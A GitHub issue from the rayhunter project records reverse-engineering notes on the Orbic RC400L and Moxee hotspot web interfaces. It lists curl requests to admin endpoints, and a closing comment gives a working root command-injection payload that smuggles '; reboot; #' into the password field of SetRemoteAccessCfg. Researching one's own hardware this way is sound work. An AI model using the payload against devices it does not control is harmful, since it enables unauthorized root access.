efforg/rayhunter#528

View on GitHub →
#528 support for Moxee Mobile Hotspot (and some braindump about orbic)
untitakeruntitaker, edited ClosedIdeas

https://www.moxee.com/hotspot

I took a look at this device, and so did @oopsbagel independently. Here’s what we know:

  • it’s the same platform as the verizon orbic rc400l, the admin ui looks identical
  • the same endpoints exist
  • however, the serial command to enable ADB doesn’t do anything

I took a look at the orbic’s goahead binary with ghidra, to learn something about either the orbic or the moxee hotspot.

SetPortMode

this endpoint is available on both moxee and orbic. it looks like it is supposed to set usb composition, according to ghidra. you can find it by searching for SetPortMode in ghidra’s strings table, in goahead binary.

$ curl 'http://192.168.1.1/action/SetPortMode' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br, zstd' -H 'Referer: http://localhost:8080/common/home.html' -H 'Content-Type: application/json' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://localhost:8080' -H 'Connection: keep-alive' -H 'Cookie: -goahead-session-=::webs.session::07d0a03f96c172c7e29a106affc946b1' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' --data-raw '{"mode": "1"}'

returns {"retcode": 100} but I don’t know why. tried a few variants ("1" vs 1) but nothing changes

SetRemoteAccessCfg

also available in both devices. is supposed to launch telnet and/or sshd. does not work:

curl 'http://192.168.1.1/action/SetRemoteAccessCfg' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br, zstd' -H 'Referer: http://localhost:8080/common/home.html' -H 'Content-Type: application/json' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://localhost:8080' -H 'Connection: keep-alive' -H "Cookie: -goahead-session-=::webs.session::07d0a03f96c172c7e29a106affc946b1" -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' --data-raw '{"sshd": 1, "telnetd": 1}'

returns {"retcode": 0} (success) but nothing is launched

Comments (2)
untitakeruntitaker

Root RCE over network for Orbic RC400L

(substitute seession cookie)

curl 'http://192.168.1.1/action/SetRemoteAccessCfg' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br, zstd' -H 'Referer: http://localhost:8080/common/home.html' -H 'Content-Type: application/json' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://localhost:8080' -H 'Connection: keep-alive' -H "Cookie: -goahead-session-=::webs.session::b575a7b39cecdb2871ed7da0aa660aea" -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' --data-raw '{"password": "\"; reboot; #"}'